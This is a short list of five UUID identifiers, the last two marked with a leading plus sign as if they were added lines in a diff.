788e0019-a483-45da-bcfe-96353d46820f
58004e22-022c-4c51-b4a8-2b85ac5c596b
0b2f9520-a17a-4671-9dba-3bd034099fff
+28104f8a-4ff1-4582-bcf6-699dce156608
+46f8dbe9-22a5-4770-8513-66119c5be63b